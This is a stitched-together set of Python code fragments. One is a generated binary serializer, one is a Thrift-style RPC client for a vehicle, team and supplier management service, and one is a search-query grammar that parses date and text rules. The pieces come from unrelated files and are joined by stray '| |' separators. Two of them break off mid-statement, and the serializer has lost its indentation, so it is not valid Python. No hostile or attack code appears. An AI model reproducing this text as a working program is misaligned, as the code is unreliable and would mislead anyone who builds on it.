        self.v17 = v17
        self.v18 = v18
        self.v19 = v19
        self.v20 = v20
        self.v21 = v21
        self.v22 = v22
        self.v23 = v23
def serialize(self):
s = b''
# serialize self.v0
s += b'\x00' if self.v0 is None else b'\x01'
if self.v0 is not None:
s += struct.pack('?', self.v0)
# serialize self.v1
s += b'\x00' if self.v1 is None else b'\x01'
if self.v1 is not None:
s += struct.pack('c', self.v1.encode('ISO-8859-1') if PY3 else self.v1)
# serialize self.v2
s += b'\x00' if self.v2 is None else b'\x01'
if self.v2 is not None:
s += struct.pack('b', self.v2)
# serialize self.v3
s += b'\x00' if self.v3 is None else b'\x01'
if self.v3 is not None:
s += struct.pack('B', self.v3)
# serialize self.v4
s += b'\x00' if self.v4 is None else b'\x01'
if self.v4 is not None:
s += struct.pack('h', self.v4)
# serialize self.v5
s += b'\x00' if self.v5 is None else b'\x01'
if self.v5 is not None:
s += struct.pack('H', self.v5)
# serialize self.v6
s += b'\x00' if self.v6 is None else b'\x01'
if self.v6 is not None:
s += struct.pack('i', self.v6)
# serialize self.v7
s += b'\x00' if self.v7 is None else b'\x01'
if self.v7 is not None:
s += struct.pack('I', self.v7)
# serialize self.v8
s += b'\x00' if self.v8 is None else b'\x01'
if self.v8 is not None:
s += struct.pack('q', self.v8)
# serialize self.v9
s += b'\x00' if self.v9 is None else b'\x01'
if self.v9 is not None:
s += struct.pack('Q', self.v9)
# serialize self.v10
s += b'\x00' if self.v10 is None else b'\x01'
if self.v10 is not None:
s += struct.pack('f', self.v10)
# serialize self.v11
s += b'\x00' if self.v11 is None else b'\x01'
if self.v11 is not None:
s += struct.pack('d', self.v11)
# serialize self.v12
s += b'\x00' if self.v12 is None else b'\x01'
if self.v12 is not None:
tmp15 = b''
tmp15 += struct.pack('I', len(self.v12))
while len(tmp15) and tmp15[-1] == b'\x00'[0]:
tmp15 = tmp15[:-1]
s += struct.pack('B', len(tmp15))
s += tmp15
s += self.v12.encode('ISO-8859-1') if PY3 else self.v12
# serialize self.v13
s += b'\x00' if self.v13 is None else b'\x01'
if self.v13 is not None:
s += struct.pack('b', self.v13.value)
# serialize self.v14
s += b'\x00' if self.v14 is None else b'\x01'
if self.v14 is not None:
s += self.v14.serialize()
# serialize self.v15
s += b'\x00' if self.v15 is None else b'\x01'
if self.v15 is not None:
tmp16 = b''
tmp16 += struct.pack('I', len(self.v15))
while len(tmp16) and tmp16[-1] == b'\x00'[0]:
tmp16 = tmp16[:-1]
s += struct.pack('B', len(tmp16))
s += tmp16
for tmp17 in self.v15:
s += b'\x00' if tmp17 is None else b'\x01'
if tmp17 is not None:
s += struct.pack('i', tmp17)
# serialize self.v16
s += b'\x00' if self.v16 is None else b'\x01'
if self.v16 is not None:
tmp18 = b''
tmp18 += struct.pack('I', len(self.v16))
while len(tmp18) and tmp18[-1] == b'\x00'[0]:
tmp18 = tmp18[:-1]
s += struct.pack('B', len(tmp18))
s += tmp18
for tmp19 in self.v16:
s += b'\x00' if tmp19 is None else b'\x01'
if tmp19 is not None:
tmp20 = b''
tmp20 += struct.pack('I', len(tmp19))
while len(tmp20) and tmp20[-1] == b'\x00'[0]:
tmp20 = tmp20[:-1]
s += struct.pack('B', len(tmp20))
s += tmp20
for tmp21 in tmp19:
s += b'\x00' if tmp21 is None else b'\x01'
if tmp21 is not None:
s += struct.pack('c', tmp21.encode('ISO-8859-1') if PY3 else tmp21)
# serialize self.v17
s += b'\x00' if self.v17 is None else b'\x01'
if self.v17 is not None:
tmp22 = b''
tmp22 += struct.pack('I', len(self.v17))
while len(tmp22) and tmp22[-1] == b'\x00'[0]:
tmp22 = tmp22[:-1]
s += struct.pack('B', len(tmp22))
s += tmp22
for tmp23 in self.v17:
s += b'\x00' if tmp23 is None else b'\x01'
if tmp23 is not None:
tmp24 = b''
tmp24 += struct.pack('I', len(tmp23))
while len(tmp24) and tmp24[-1] == b'\x00'[0]:
tmp24 = tmp24[:-1]
s += struct.pack('B', len(tmp24))
s += tmp24
s += tmp23.encode('ISO-8859-1') if PY3 else tmp23
s += b'\x00' if self.v17[tmp23] is None else b'\x01'
if self.v17[tmp23] is not None:
s += struct.pack('i', self.v17[tmp23])
# serialize self.v18
s += b'\x00' if self.v18 is None else b'\x01'
if self.v18 is not None:
tmp25 = b''
tmp25 += struct.pack('I', len(self.v18))
while len(tmp25) and tmp25[-1] == b'\x00'[0]:
tmp25 = tmp25[:-1]
s += struct.pack('B', len(tmp25))
s += tmp25
for tmp26 in self.v18:
s += b'\x00' if tmp26 is None else b'\x01'
if tmp26 is not None:
s += struct.pack('c', tmp26.encode('ISO-8859-1') if PY3 else tmp26)
s += b'\x00' if self.v18[tmp26] is None else b'\x01'
if self.v18[tmp26] is not None:
tmp27 = b''
tmp27 += struct.pack('I', len(self.v18[tmp26]))
while len(tmp27) and tmp27[-1] == b'\x00'[0]:
tmp27 = tmp27[:-1]
s += struct.pack('B', len(tmp27))
s += tmp27
for tmp28 in self.v18[tmp26]:
s += b'\x00' if tmp28 is None else b'\x01'
if tmp28 is not None:
tmp29 = b''
tmp29 += struct.pack('I', len(tmp28))
while len(tmp29) and tmp29[-1] == b'\x00'[0]:
tmp29 = tmp29[:-1]
s += struct.pack('B', len(tmp29))
s += tmp29
for tmp30 in tmp28:
s += b'\x00' if tmp30 is None else b'\x01'
if tmp30 is not None:
s += struct.pack('d', tmp30)
s += b'\x00' if tmp28[tmp30] is None else b'\x01'
if tmp28[tmp30] is not None:
s += struct.pack('b', tmp28[tmp30].value)
# serialize self.v19
s += b'\x00' if self.v19 is None else b'\x01'
if self.v19 is not None:
for tmp31 in range(10):
s += b'\x00' if self.v19[tmp31] is None else b'\x01'
if self.v19[tmp31] is not None:
s += struct.pack('b', self.v19[tmp31])
# serialize self.v20
s += b'\x00' if self.v20 is None else b'\x01'
if self.v20 is not None:
for tmp32 in range(10):
for tmp33 in range(20):
s += b'\x00' if self.v20[tmp32][tmp33] is None else b'\x01'
if self.v20[tmp32][tmp33] is not None:
tmp34 = b''
tmp34 += struct.pack('I', len(self.v20[tmp32][tmp33]))
while len(tmp34) and tmp34[-1] == b'\x00'[0]:
tmp34 = tmp34[:-1]
s += struct.pack('B', len(tmp34))
s += tmp34
for tmp35 in self.v20[tmp32][tmp33]:
s += b'\x00' if tmp35 is None else b'\x01'
if tmp35 is not None:
tmp36 = b''
tmp36 += struct.pack('I', len(tmp35))
while len(tmp36) and tmp36[-1] == b'\x00'[0]:
tmp36 = tmp36[:-1]
s += struct.pack('B', len(tmp36))
s += tmp36
s += tmp35.encode('ISO-8859-1') if PY3 else tmp35
# serialize self.v21
s += b'\x00' if self.v21 is None else b'\x01'
if self.v21 is not None:
tmp37 = b''
tmp37 += struct.pack('I', len(self.v21))
while len(tmp37) and tmp37[-1] == b'\x00'[0]:
tmp37 = tmp37[:-1]
s += struct.pack('B', len(tmp37))
s += tmp37
for tmp38 in self.v21:
s += b'\x00' if tmp38 is None else b'\x01'
if tmp38 is not None:
for tmp39 in range(4):
s += b'\x00' if tmp38[tmp39] is None else b'\x01'
if tmp38[tmp39] | |
args.ssid = ssid
args.anchor = anchor
args.status = status
args.enter_date = enter_date
args.stuff_name = stuff_name
args.supplier_name = supplier_name
args.vichele_number = vichele_number
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
    def recv_get_company_vichele_info(self):
        """Read the get_company_vichele_info reply; return the result or raise."""
        iprot = self._iprot
        (fname, mtype, rseqid) = iprot.readMessageBegin()
        if mtype == TMessageType.EXCEPTION:
            # protocol-level failure reported by the server
            x = TApplicationException()
            x.read(iprot)
            iprot.readMessageEnd()
            raise x
        result = get_company_vichele_info_result()
        result.read(iprot)
        iprot.readMessageEnd()
        if result.success is not None:
            return result.success
        if result.e is not None:
            # service-declared exception
            raise result.e
        raise TApplicationException(TApplicationException.MISSING_RESULT, "get_company_vichele_info failed: unknown result")
    def confirm_vichele(self, ssid, info, company_for_select, all_select, enter_date, stuff_name, supplier_name):
        """
        Parameters:
         - ssid
         - info
         - company_for_select
         - all_select
         - enter_date
         - stuff_name
         - supplier_name
        """
        # synchronous RPC: send the request, then block on the reply
        self.send_confirm_vichele(ssid, info, company_for_select, all_select, enter_date, stuff_name, supplier_name)
        return self.recv_confirm_vichele()
    def send_confirm_vichele(self, ssid, info, company_for_select, all_select, enter_date, stuff_name, supplier_name):
        """Write the confirm_vichele call message and flush the transport."""
        self._oprot.writeMessageBegin('confirm_vichele', TMessageType.CALL, self._seqid)
        args = confirm_vichele_args()
        args.ssid = ssid
        args.info = info
        args.company_for_select = company_for_select
        args.all_select = all_select
        args.enter_date = enter_date
        args.stuff_name = stuff_name
        args.supplier_name = supplier_name
        args.write(self._oprot)
        self._oprot.writeMessageEnd()
        self._oprot.trans.flush()
    def recv_confirm_vichele(self):
        """Read the confirm_vichele reply; return the result or raise."""
        iprot = self._iprot
        (fname, mtype, rseqid) = iprot.readMessageBegin()
        if mtype == TMessageType.EXCEPTION:
            x = TApplicationException()
            x.read(iprot)
            iprot.readMessageEnd()
            raise x
        result = confirm_vichele_result()
        result.read(iprot)
        iprot.readMessageEnd()
        if result.success is not None:
            return result.success
        if result.e is not None:
            raise result.e
        raise TApplicationException(TApplicationException.MISSING_RESULT, "confirm_vichele failed: unknown result")
    def cancel_vichele(self, ssid, info, all_select, enter_date, stuff_name, supplier_name):
        """
        Parameters:
         - ssid
         - info
         - all_select
         - enter_date
         - stuff_name
         - supplier_name
        """
        # synchronous RPC: send the request, then block on the reply
        self.send_cancel_vichele(ssid, info, all_select, enter_date, stuff_name, supplier_name)
        return self.recv_cancel_vichele()
    def send_cancel_vichele(self, ssid, info, all_select, enter_date, stuff_name, supplier_name):
        """Write the cancel_vichele call message and flush the transport."""
        self._oprot.writeMessageBegin('cancel_vichele', TMessageType.CALL, self._seqid)
        args = cancel_vichele_args()
        args.ssid = ssid
        args.info = info
        args.all_select = all_select
        args.enter_date = enter_date
        args.stuff_name = stuff_name
        args.supplier_name = supplier_name
        args.write(self._oprot)
        self._oprot.writeMessageEnd()
        self._oprot.trans.flush()
    def recv_cancel_vichele(self):
        """Read the cancel_vichele reply; return the result or raise."""
        iprot = self._iprot
        (fname, mtype, rseqid) = iprot.readMessageBegin()
        if mtype == TMessageType.EXCEPTION:
            x = TApplicationException()
            x.read(iprot)
            iprot.readMessageEnd()
            raise x
        result = cancel_vichele_result()
        result.read(iprot)
        iprot.readMessageEnd()
        if result.success is not None:
            return result.success
        if result.e is not None:
            raise result.e
        raise TApplicationException(TApplicationException.MISSING_RESULT, "cancel_vichele failed: unknown result")
    def create_vichele_team(self, open_id, team_info):
        """
        Parameters:
         - open_id
         - team_info
        """
        # synchronous RPC: send the request, then block on the reply
        self.send_create_vichele_team(open_id, team_info)
        return self.recv_create_vichele_team()
    def send_create_vichele_team(self, open_id, team_info):
        """Write the create_vichele_team call message and flush the transport."""
        self._oprot.writeMessageBegin('create_vichele_team', TMessageType.CALL, self._seqid)
        args = create_vichele_team_args()
        args.open_id = open_id
        args.team_info = team_info
        args.write(self._oprot)
        self._oprot.writeMessageEnd()
        self._oprot.trans.flush()
    def recv_create_vichele_team(self):
        """Read the create_vichele_team reply; return the result or raise."""
        iprot = self._iprot
        (fname, mtype, rseqid) = iprot.readMessageBegin()
        if mtype == TMessageType.EXCEPTION:
            x = TApplicationException()
            x.read(iprot)
            iprot.readMessageEnd()
            raise x
        result = create_vichele_team_result()
        result.read(iprot)
        iprot.readMessageEnd()
        if result.success is not None:
            return result.success
        if result.e is not None:
            raise result.e
        raise TApplicationException(TApplicationException.MISSING_RESULT, "create_vichele_team failed: unknown result")
    def update_vichele_team(self, open_id, team_info):
        """
        Parameters:
         - open_id
         - team_info
        """
        # synchronous RPC: send the request, then block on the reply
        self.send_update_vichele_team(open_id, team_info)
        return self.recv_update_vichele_team()
    def send_update_vichele_team(self, open_id, team_info):
        """Write the update_vichele_team call message and flush the transport."""
        self._oprot.writeMessageBegin('update_vichele_team', TMessageType.CALL, self._seqid)
        args = update_vichele_team_args()
        args.open_id = open_id
        args.team_info = team_info
        args.write(self._oprot)
        self._oprot.writeMessageEnd()
        self._oprot.trans.flush()
    def recv_update_vichele_team(self):
        """Read the update_vichele_team reply; return the result or raise."""
        iprot = self._iprot
        (fname, mtype, rseqid) = iprot.readMessageBegin()
        if mtype == TMessageType.EXCEPTION:
            x = TApplicationException()
            x.read(iprot)
            iprot.readMessageEnd()
            raise x
        result = update_vichele_team_result()
        result.read(iprot)
        iprot.readMessageEnd()
        if result.success is not None:
            return result.success
        if result.e is not None:
            raise result.e
        raise TApplicationException(TApplicationException.MISSING_RESULT, "update_vichele_team failed: unknown result")
    def del_vichele_team(self, open_id, team_id):
        """
        Parameters:
         - open_id
         - team_id
        """
        # synchronous RPC: send the request, then block on the reply
        self.send_del_vichele_team(open_id, team_id)
        return self.recv_del_vichele_team()
    def send_del_vichele_team(self, open_id, team_id):
        """Write the del_vichele_team call message and flush the transport."""
        self._oprot.writeMessageBegin('del_vichele_team', TMessageType.CALL, self._seqid)
        args = del_vichele_team_args()
        args.open_id = open_id
        args.team_id = team_id
        args.write(self._oprot)
        self._oprot.writeMessageEnd()
        self._oprot.trans.flush()
    def recv_del_vichele_team(self):
        """Read the del_vichele_team reply; return the result or raise."""
        iprot = self._iprot
        (fname, mtype, rseqid) = iprot.readMessageBegin()
        if mtype == TMessageType.EXCEPTION:
            x = TApplicationException()
            x.read(iprot)
            iprot.readMessageEnd()
            raise x
        result = del_vichele_team_result()
        result.read(iprot)
        iprot.readMessageEnd()
        if result.success is not None:
            return result.success
        if result.e is not None:
            raise result.e
        raise TApplicationException(TApplicationException.MISSING_RESULT, "del_vichele_team failed: unknown result")
    def get_all_vichele_team(self, open_id):
        """
        Parameters:
         - open_id
        """
        # synchronous RPC: send the request, then block on the reply
        self.send_get_all_vichele_team(open_id)
        return self.recv_get_all_vichele_team()
    def send_get_all_vichele_team(self, open_id):
        """Write the get_all_vichele_team call message and flush the transport."""
        self._oprot.writeMessageBegin('get_all_vichele_team', TMessageType.CALL, self._seqid)
        args = get_all_vichele_team_args()
        args.open_id = open_id
        args.write(self._oprot)
        self._oprot.writeMessageEnd()
        self._oprot.trans.flush()
    def recv_get_all_vichele_team(self):
        """Read the get_all_vichele_team reply; return the result or raise."""
        iprot = self._iprot
        (fname, mtype, rseqid) = iprot.readMessageBegin()
        if mtype == TMessageType.EXCEPTION:
            x = TApplicationException()
            x.read(iprot)
            iprot.readMessageEnd()
            raise x
        result = get_all_vichele_team_result()
        result.read(iprot)
        iprot.readMessageEnd()
        if result.success is not None:
            return result.success
        if result.e is not None:
            raise result.e
        raise TApplicationException(TApplicationException.MISSING_RESULT, "get_all_vichele_team failed: unknown result")
    def get_vichele_team(self, open_id, team_id):
        """
        Parameters:
         - open_id
         - team_id
        """
        # synchronous RPC: send the request, then block on the reply
        self.send_get_vichele_team(open_id, team_id)
        return self.recv_get_vichele_team()
    def send_get_vichele_team(self, open_id, team_id):
        """Write the get_vichele_team call message and flush the transport."""
        self._oprot.writeMessageBegin('get_vichele_team', TMessageType.CALL, self._seqid)
        args = get_vichele_team_args()
        args.open_id = open_id
        args.team_id = team_id
        args.write(self._oprot)
        self._oprot.writeMessageEnd()
        self._oprot.trans.flush()
    def recv_get_vichele_team(self):
        """Read the get_vichele_team reply; return the result or raise."""
        iprot = self._iprot
        (fname, mtype, rseqid) = iprot.readMessageBegin()
        if mtype == TMessageType.EXCEPTION:
            x = TApplicationException()
            x.read(iprot)
            iprot.readMessageEnd()
            raise x
        result = get_vichele_team_result()
        result.read(iprot)
        iprot.readMessageEnd()
        if result.success is not None:
            return result.success
        if result.e is not None:
            raise result.e
        raise TApplicationException(TApplicationException.MISSING_RESULT, "get_vichele_team failed: unknown result")
    def change_company_name(self, ssid, vichele_id, company_name):
        """
        Parameters:
         - ssid
         - vichele_id
         - company_name
        """
        # synchronous RPC: send the request, then block on the reply
        self.send_change_company_name(ssid, vichele_id, company_name)
        return self.recv_change_company_name()
    def send_change_company_name(self, ssid, vichele_id, company_name):
        """Write the change_company_name call message and flush the transport."""
        self._oprot.writeMessageBegin('change_company_name', TMessageType.CALL, self._seqid)
        args = change_company_name_args()
        args.ssid = ssid
        args.vichele_id = vichele_id
        args.company_name = company_name
        args.write(self._oprot)
        self._oprot.writeMessageEnd()
        self._oprot.trans.flush()
    def recv_change_company_name(self):
        """Read the change_company_name reply; return the result or raise."""
        iprot = self._iprot
        (fname, mtype, rseqid) = iprot.readMessageBegin()
        if mtype == TMessageType.EXCEPTION:
            x = TApplicationException()
            x.read(iprot)
            iprot.readMessageEnd()
            raise x
        result = change_company_name_result()
        result.read(iprot)
        iprot.readMessageEnd()
        if result.success is not None:
            return result.success
        if result.e is not None:
            raise result.e
        raise TApplicationException(TApplicationException.MISSING_RESULT, "change_company_name failed: unknown result")
    def fill_company_name(self, open_id, vichele_id, company_name):
        """
        Parameters:
         - open_id
         - vichele_id
         - company_name
        """
        # synchronous RPC: send the request, then block on the reply
        self.send_fill_company_name(open_id, vichele_id, company_name)
        return self.recv_fill_company_name()
    def send_fill_company_name(self, open_id, vichele_id, company_name):
        """Write the fill_company_name call message and flush the transport."""
        self._oprot.writeMessageBegin('fill_company_name', TMessageType.CALL, self._seqid)
        args = fill_company_name_args()
        args.open_id = open_id
        args.vichele_id = vichele_id
        args.company_name = company_name
        args.write(self._oprot)
        self._oprot.writeMessageEnd()
        self._oprot.trans.flush()
    def recv_fill_company_name(self):
        """Read the fill_company_name reply; return the result or raise."""
        iprot = self._iprot
        (fname, mtype, rseqid) = iprot.readMessageBegin()
        if mtype == TMessageType.EXCEPTION:
            x = TApplicationException()
            x.read(iprot)
            iprot.readMessageEnd()
            raise x
        result = fill_company_name_result()
        result.read(iprot)
        iprot.readMessageEnd()
        if result.success is not None:
            return result.success
        if result.e is not None:
            raise result.e
        raise TApplicationException(TApplicationException.MISSING_RESULT, "fill_company_name failed: unknown result")
    def company_history(self, ssid):
        """
        Parameters:
         - ssid
        """
        # synchronous RPC: send the request, then block on the reply
        self.send_company_history(ssid)
        return self.recv_company_history()
    def send_company_history(self, ssid):
        """Write the company_history call message and flush the transport."""
        self._oprot.writeMessageBegin('company_history', TMessageType.CALL, self._seqid)
        args = company_history_args()
        args.ssid = ssid
        args.write(self._oprot)
        self._oprot.writeMessageEnd()
        self._oprot.trans.flush()
    def recv_company_history(self):
        """Read the company_history reply; return the result or raise."""
        iprot = self._iprot
        (fname, mtype, rseqid) = iprot.readMessageBegin()
        if mtype == TMessageType.EXCEPTION:
            x = TApplicationException()
            x.read(iprot)
            iprot.readMessageEnd()
            raise x
        result = company_history_result()
        result.read(iprot)
        iprot.readMessageEnd()
        if result.success is not None:
            return result.success
        if result.e is not None:
            raise result.e
        raise TApplicationException(TApplicationException.MISSING_RESULT, "company_history failed: unknown result")
    def add_supplier(self, ssid, supplier_info):
        """
        Parameters:
         - ssid
         - supplier_info
        """
        # synchronous RPC: send the request, then block on the reply
        self.send_add_supplier(ssid, supplier_info)
        return self.recv_add_supplier()
    def send_add_supplier(self, ssid, supplier_info):
        """Write the add_supplier call message and flush the transport."""
        self._oprot.writeMessageBegin('add_supplier', TMessageType.CALL, self._seqid)
        args = add_supplier_args()
        args.ssid = ssid
        args.supplier_info = supplier_info
        args.write(self._oprot)
        self._oprot.writeMessageEnd()
        self._oprot.trans.flush()
    def recv_add_supplier(self):
        """Read the add_supplier reply; return the result or raise."""
        iprot = self._iprot
        (fname, mtype, rseqid) = iprot.readMessageBegin()
        if mtype == TMessageType.EXCEPTION:
            x = TApplicationException()
            x.read(iprot)
            iprot.readMessageEnd()
            raise x
        result = add_supplier_result()
        result.read(iprot)
        iprot.readMessageEnd()
        if result.success is not None:
            return result.success
        if result.e is not None:
            raise result.e
        raise TApplicationException(TApplicationException.MISSING_RESULT, "add_supplier failed: unknown result")
    def update_supplier(self, ssid, supplier_info):
        """
        Parameters:
         - ssid
         - supplier_info
        """
        # synchronous RPC: send the request, then block on the reply
        self.send_update_supplier(ssid, supplier_info)
        return self.recv_update_supplier()
    def send_update_supplier(self, ssid, supplier_info):
        """Write the update_supplier call message and flush the transport."""
        self._oprot.writeMessageBegin('update_supplier', TMessageType.CALL, self._seqid)
        args = update_supplier_args()
        args.ssid = ssid
        args.supplier_info = supplier_info
        args.write(self._oprot)
        self._oprot.writeMessageEnd()
        self._oprot.trans.flush()
    def recv_update_supplier(self):
        """Read the update_supplier reply; return the result or raise."""
        iprot = self._iprot
        (fname, mtype, rseqid) = iprot.readMessageBegin()
        if mtype == TMessageType.EXCEPTION:
            x = TApplicationException()
            x.read(iprot)
            iprot.readMessageEnd()
            raise x
        result = update_supplier_result()
        result.read(iprot)
        iprot.readMessageEnd()
        if result.success is not None:
            return result.success
        if result.e is not None:
            raise result.e
        raise TApplicationException(TApplicationException.MISSING_RESULT, "update_supplier failed: unknown result")
    def del_supplier(self, ssid, supplier_id):
        """
        Parameters:
         - ssid
         - supplier_id
        """
        # synchronous RPC: send the request, then block on the reply
        self.send_del_supplier(ssid, supplier_id)
        return self.recv_del_supplier()
    def send_del_supplier(self, ssid, supplier_id):
        """Write the del_supplier call message and flush the transport."""
        self._oprot.writeMessageBegin('del_supplier', TMessageType.CALL, self._seqid)
        args = del_supplier_args()
        args.ssid = ssid
        args.supplier_id = supplier_id
        args.write(self._oprot)
        self._oprot.writeMessageEnd()
        self._oprot.trans.flush()
    def recv_del_supplier(self):
        """Read the del_supplier reply; return the result or raise."""
        iprot = self._iprot
        (fname, mtype, rseqid) = iprot.readMessageBegin()
        if mtype == TMessageType.EXCEPTION:
            x = TApplicationException()
            x.read(iprot)
            iprot.readMessageEnd()
            raise x
        result = del_supplier_result()
        result.read(iprot)
        iprot.readMessageEnd()
        if result.success is not None:
            return result.success
        if result.e is not None:
            raise result.e
        raise TApplicationException(TApplicationException.MISSING_RESULT, "del_supplier failed: unknown result")
    def get_all_supplier(self, ssid):
        """
        Parameters:
         - ssid
        """
        # synchronous RPC: send the request, then block on the reply
        self.send_get_all_supplier(ssid)
        return self.recv_get_all_supplier()
    def send_get_all_supplier(self, ssid):
        """Write the get_all_supplier call message and flush the transport."""
        self._oprot.writeMessageBegin('get_all_supplier', TMessageType.CALL, self._seqid)
        args = get_all_supplier_args()
        args.ssid = ssid
        args.write(self._oprot)
        self._oprot.writeMessageEnd()
        self._oprot.trans.flush()
    def recv_get_all_supplier(self):
        """Read the get_all_supplier reply; return the result or raise."""
        iprot = self._iprot
        (fname, mtype, rseqid) = iprot.readMessageBegin()
        if mtype == TMessageType.EXCEPTION:
            x = TApplicationException()
            x.read(iprot)
            iprot.readMessageEnd()
            raise x
        result = get_all_supplier_result()
        result.read(iprot)
        iprot.readMessageEnd()
        if result.success is not None:
            return result.success
        if result.e is not None:
            raise result.e
        raise TApplicationException(TApplicationException.MISSING_RESULT, "get_all_supplier failed: unknown result")
    def smart_assign(self, ssid, vichele_info):
        """
        Parameters:
         - ssid
         - vichele_info
        """
        # synchronous RPC: send the request, then block on the reply
        self.send_smart_assign(ssid, vichele_info)
        return self.recv_smart_assign()
def send_smart_assign(self, ssid, vichele_info):
self._oprot.writeMessageBegin('smart_assign', TMessageType.CALL, self._seqid)
args = smart_assign_args()
args.ssid | |
continue
elif tok not in self.operators_flow:
tokens[i] = self.buildRule(current_col,current_opr,tok)
i+=1
# return the single rule of a meta rule of all rules
if len(tokens) == 1:
return tokens[0]
return self.operators_flow_join( tokens )
def addMeta(self, colid, tok, value, top):
""" meta options control sql parameters of the query
They are independant of any database.
"""
if not top:
raise ParseError("Option `%s` at position %d can only be provided at the top level."%(colid,colid.pos))
if colid in self.meta_options:
raise ParseError("Option `%s` at position %d can not be provided twice"%(colid,colid.pos))
if tok not in self.operators:
raise ParseError("Operator `%s` at position %d not valid in this context"%(tok,tok.pos))
rule = self.operators[tok]
if colid == Grammar.META_DEBUG:
self.meta_options[colid] = int(value)
elif colid in (Grammar.META_LIMIT,Grammar.META_OFFSET):
if rule in (PartialStringSearchRule, ExactSearchRule):
self.meta_options[colid] = int(value)
else:
raise ParseError("Illegal operation `%s` at position %d for option `%s`"%(tok,tok.pos,colid))
    # protected
    def compile_operators(self):
        """Build the token/operator tables; subclasses must override."""
        raise NotImplementedError()
    def buildRule(self, colid, rule ,value):
        """Construct a rule for column `colid` from operator class `rule` and `value`; abstract."""
        raise NotImplementedError()
class SearchGrammar(Grammar):
    """Grammar that turns query text into column-based *search* rules."""
    def __init__(self):
        super(SearchGrammar, self).__init__()
    def compile_operators(self):
        """Define token classes and the operator -> rule-class tables."""
        self.all_text = 'text'
        # sigil is used to define the oldstyle syntax marker
        # it should not appear in tok_special
        self.sigil = '.'
        # tokens control how the grammar is parsed.
        self.tok_whitespace = " \t" # token separators
        # all meaningful non-text chars
        self.tok_operators = '~!=<>'
        self.tok_flow = "|&"
        self.tok_special = self.tok_operators + self.tok_flow
        self.tok_negate = "!"
        self.tok_nest_begin = '('
        self.tok_nest_end = ')'
        self.tok_quote = "\""
        self.tok_escape = "\\"
        # does not require left token
        self.operators = {
            "=" :PartialStringSearchRule,
            "~" :PartialStringSearchRule,
            "==":ExactSearchRule,
            "=~":RegExpSearchRule,
            "!=":InvertedPartialStringSearchRule,
            "!==":InvertedExactSearchRule,
        }
        self.operators_invert = {
            InvertedPartialStringSearchRule :PartialStringSearchRule,
            InvertedExactSearchRule:ExactSearchRule,
            PartialStringSearchRule:InvertedPartialStringSearchRule,
            ExactSearchRule:InvertedExactSearchRule,
        }
        # require left/right token
        self.special = {
            "<" : LessThanSearchRule,
            ">" : GreaterThanSearchRule,
            "<=" : LessThanEqualSearchRule,
            ">=" : GreaterThanEqualSearchRule,
        }
        self.special_invert = {
            GreaterThanSearchRule : LessThanSearchRule,
            LessThanSearchRule : GreaterThanSearchRule,
            GreaterThanEqualSearchRule : LessThanEqualSearchRule,
            LessThanEqualSearchRule : GreaterThanEqualSearchRule,
        }
        # meta options can be used to control the query results
        # by default, limit could be used to limit the number of results
        self.meta_columns = set([Grammar.META_LIMIT,Grammar.META_OFFSET,Grammar.META_DEBUG])
        self.meta_options = dict()
        self.old_style_operators = self.operators.copy()
        self.old_style_operators.update(self.special)
        self.old_style_operators_invert = self.operators_invert.copy()
        self.old_style_operators_invert.update(self.special_invert)
        self.operators_flow = {
            "&&" : AndSearchRule,
            "||" : OrSearchRule,
            "!" : NotSearchRule,
        }
        self.operators_flow_invert = { v:k for k,v in self.operators_flow.items() }
        self.operators_flow_join = AndSearchRule
    def buildRule(self, colid, rule ,value):
        """Build the concrete search rule for one `column operator value` triple.

        this must be expanded to support new data formats.
        """
        col = self.translateColumn( colid )
        if col == self.all_text:
            return self.allTextRule(rule, value)
        elif col in self.text_fields:
            return rule( col, value )
        elif col in self.date_fields:
            return self.buildDateRule(col, rule, value)
        # numeric field
        # partial rules don't make sense, convert to exact rules
        if col in self.time_fields:
            value = self.fc.parseDuration( value )
        if col in self.year_fields:
            value = self.fc.parseYear( value )
        # NOTE: text columns returned above, so type_ always ends up int here;
        # the str default is kept for safety should the branches change.
        type_ = str
        if col not in self.text_fields:
            type_ = int
        if rule is PartialStringSearchRule:
            return ExactSearchRule(col, value, type_=type_)
        if rule is InvertedPartialStringSearchRule:
            return InvertedExactSearchRule(col, value, type_=type_)
        return rule( col, value, type_=type_)
    def buildDateRule( self, col, rule, value):
        """
        There are two date fields, 'last_played' and 'date_added'
        queries can be run in two modes.
        providing an integer (e.g. date < N) performs a relative search
        from the current date, in this examples songs played since N days ago.
        providing a date string will run an exact search. (e.g. date < 15/3/12)
        the string is parsed y/m/d but otherwise behaves exactly the same way.
        < : closer to present day, including the date given
        > : farther into the past, excluding the given date
        = : exactly that day, from 00:00:00 to 23:59:59
        """
        c = value.count('/')
        invert = False
        # BUGFIX: this used to be an `elif c > 2` *after* `if c > 0`, which made
        # it unreachable.  Check it first, and outside the try block so the
        # ParseError cannot be swallowed by the ValueError fallback below.
        if c > 2:
            # the user gave too many separators for the date to make sense
            # TODO: create a special format for YY/MM/DD since that it can
            # be modified for other orders
            raise ParseError("Invalid Date format `%s` at position %d. Expected YY/MM/DD."%(value,value.pos))
        try:
            if c > 0:
                # if there are any slashes assume the user wants to
                # parse the string as some form of YYYY/MM/DD
                epochtime,epochtime2 = self.fc.formatDate( value )
            else:
                # parse the bare integer as a day-delta
                epochtime,epochtime2 = self.fc.formatDateDelta( value )
                invert = True
        except ValueError:
            # something went wrong trying to parse the date, try parsing
            # it as a natural string instead
            result = self.fc.parseNLPDate( value )
            if result is None:
                # failed to convert istr -> int
                raise ParseError("Expected Integer or Date, found `%s` at position %d"%(value,value.pos))
            epochtime,epochtime2 = result
        # flip the context of '<' and '>'
        # for dates, '<' means closer to present day
        # date < 5 is anything in the last 5 days
        # only invert when giving a relative date range
        # inverted query when giving an absolute date is confusing
        if invert and rule in self.special_invert:
            rule = self.special_invert[rule]
        # token '=' is partial string matching, in the context of dates
        # it will return any song played exactly n days ago
        # a value of '1' is yesterday
        if rule is PartialStringSearchRule:
            return RangeSearchRule(col, IntDate(epochtime), IntDate(epochtime2), type_=int)
        # inverted range matching
        if rule is InvertedPartialStringSearchRule:
            return NotRangeSearchRule(col, IntDate(epochtime), IntDate(epochtime2), type_=int)
        # todo: this needs further testing due to recent change
        # if invert is true, use less than equal
        # if invert is false, use greater than equal (i believe this is needed)
        if invert and rule is LessThanEqualSearchRule:
            return rule( col, IntDate(epochtime2), type_=int)
        return rule( col, IntDate(epochtime), type_=int)
    def allTextRule(self, rule, string ):
        """
        returns a rule that will return true if
        any text field matches the given string
        or if no text field contains the string
        """
        return MultiColumnSearchRule(rule, self.text_fields, string, colid=self.all_text)
class UpdateRule(Rule):
